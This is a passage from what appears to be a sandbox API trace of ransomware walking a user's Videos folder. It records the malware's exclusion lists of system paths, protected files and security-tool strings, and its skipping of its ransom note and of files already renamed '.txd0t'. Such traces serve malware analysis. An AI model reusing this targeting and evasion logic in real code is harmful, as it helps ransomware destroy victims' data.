lpSrch=":\\drivers\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\wsus\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="crypt_detect") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="cryptolocker") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="ransomware") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\WINDOWS") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.727] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\Program Files") returned 0x0 [0129.727] GetProcessHeap () returned 0xe30000 [0129.727] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c8) returned 0xed90d0 [0129.727] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0129.727] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\*", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*" [0129.727] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f2440, ftCreationTime.dwHighDateTime=0x1d5e778, ftLastAccessTime.dwLowDateTime=0x52ab196d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52ab196d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.728] StrCmpW (psz1=".", psz2=".") returned 0 [0129.728] StrCmpW (psz1="..", psz2=".") returned 1 [0129.728] StrCmpW (psz1="..", psz2="..") returned 0 [0129.728] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.728] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.728] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0129.728] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\" [0129.728] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\!TXDOT_READ_ME!.txt" [0129.728] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.728] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.728] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.728] StrCmpW (psz1="cDQNx.mp4.txd0t", psz2=".") returned 1 [0129.728] StrCmpW (psz1="cDQNx.mp4.txd0t", psz2="..") returned 1 [0129.728] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0129.728] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\" [0129.728] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\", psz2="cDQNx.mp4.txd0t", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4.txd0t" [0129.728] PathFindExtensionW (pszPath="cDQNx.mp4.txd0t") returned=".txd0t" [0129.728] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.729] StrCmpW (psz1="YD6Z6S-cuGg", psz2=".") returned 1 [0129.729] StrCmpW (psz1="YD6Z6S-cuGg", psz2="..") returned 1 [0129.729] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0129.729] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\" [0129.729] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\", psz2="YD6Z6S-cuGg", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\system32\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\system\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\local\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\boot\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\perflogs\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\programdata\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\drivers\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\wsus\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="crypt_detect") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="cryptolocker") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="ransomware") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\WINDOWS") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.729] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\Program Files") returned 0x0 [0129.729] GetProcessHeap () returned 0xe30000 [0129.729] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e0) returned 0xef3600 [0129.729] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0129.729] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\*", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*" [0129.729] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*", lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x52dacb88, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52dacb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1bf0 [0129.730] StrCmpW (psz1=".", psz2=".") returned 0 [0129.730] StrCmpW (psz1="..", psz2=".") returned 1 [0129.730] StrCmpW (psz1="..", psz2="..") returned 0 [0129.730] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.730] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.730] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0129.730] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0129.730] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\!TXDOT_READ_ME!.txt" [0129.730] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.730] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.730] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.730] StrCmpW (psz1="6HAlI.avi.txd0t", psz2=".") returned 1 [0129.730] StrCmpW (psz1="6HAlI.avi.txd0t", psz2="..") returned 1 [0129.730] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0129.730] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0129.730] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="6HAlI.avi.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi.txd0t" [0129.730] PathFindExtensionW (pszPath="6HAlI.avi.txd0t") returned=".txd0t" [0129.731] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.731] StrCmpW (psz1="8aR-oZ.mp4.txd0t", psz2=".") returned 1 [0129.731] StrCmpW (psz1="8aR-oZ.mp4.txd0t", psz2="..") returned 1 [0129.731] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0129.731] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0129.731] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="8aR-oZ.mp4.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4.txd0t" [0129.731] PathFindExtensionW (pszPath="8aR-oZ.mp4.txd0t") returned=".txd0t" [0129.731] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.731] StrCmpW (psz1="hrFHHxEDNXCX.swf.txd0t", psz2=".") returned 1 [0129.731] StrCmpW (psz1="hrFHHxEDNXCX.swf.txd0t", psz2="..") returned 1 [0129.731] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0129.731] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0129.731] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="hrFHHxEDNXCX.swf.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf.txd0t" [0129.731] PathFindExtensionW (pszPath="hrFHHxEDNXCX.swf.txd0t") returned=".txd0t" [0129.731] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.731] StrCmpW (psz1="P6NtF9p_sziw.mp4.txd0t", psz2=".") returned 1 [0129.731] StrCmpW (psz1="P6NtF9p_sziw.mp4.txd0t", psz2="..") returned 1 [0129.731] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0129.731] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0129.731] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="P6NtF9p_sziw.mp4.txd0t", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4.txd0t" [0129.731] PathFindExtensionW (pszPath="P6NtF9p_sziw.mp4.txd0t") returned=".txd0t" [0129.731] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.731] StrCmpW (psz1="e7C5rm59mT0uP_9f.avi.txd0t", psz2=".") returned 1 [0129.731] StrCmpW (psz1="e7C5rm59mT0uP_9f.avi.txd0t", psz2="..") returned 1 [0129.731] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0129.731] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0129.731] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="e7C5rm59mT0uP_9f.avi.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi.txd0t" [0129.731] PathFindExtensionW (pszPath="e7C5rm59mT0uP_9f.avi.txd0t") returned=".txd0t" [0129.731] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.731] StrCmpW (psz1="gPsXouAw.flv.txd0t", psz2=".") returned 1 [0129.731] StrCmpW (psz1="gPsXouAw.flv.txd0t", psz2="..") returned 1 [0129.732] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0129.732] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0129.732] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="gPsXouAw.flv.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv.txd0t" [0129.732] PathFindExtensionW (pszPath="gPsXouAw.flv.txd0t") returned=".txd0t" [0129.732] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.732] StrCmpW (psz1="GsXmIOztESVB3CY.mp4.txd0t", psz2=".") returned 1 [0129.732] StrCmpW (psz1="GsXmIOztESVB3CY.mp4.txd0t", psz2="..") returned 1 [0129.732] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0129.732] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0129.732] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="GsXmIOztESVB3CY.mp4.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4.txd0t" [0129.732] PathFindExtensionW (pszPath="GsXmIOztESVB3CY.mp4.txd0t") returned=".txd0t" [0129.732] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.732] StrCmpW (psz1="JbkR3ATa90b5U.avi.txd0t", psz2=".") returned 1 [0129.732] StrCmpW (psz1="JbkR3ATa90b5U.avi.txd0t", psz2="..") returned 1 [0129.732] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0129.732] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0129.732] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="JbkR3ATa90b5U.avi.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi.txd0t" [0129.732] PathFindExtensionW (pszPath="JbkR3ATa90b5U.avi.txd0t") returned=".txd0t" [0129.732] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.732] StrCmpW (psz1="ofxv0mmpKK_", psz2=".") returned 1 [0129.732] StrCmpW (psz1="ofxv0mmpKK_", psz2="..") returned 1 [0129.732] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0129.732] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0129.732] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="ofxv0mmpKK_", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0129.732] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\system32\\") returned 0x0 [0129.732] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.732] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\system\\") returned 0x0 [0129.732] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.732] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.732] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\local\\") returned 0x0 [0129.732] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.732] StrStrIW 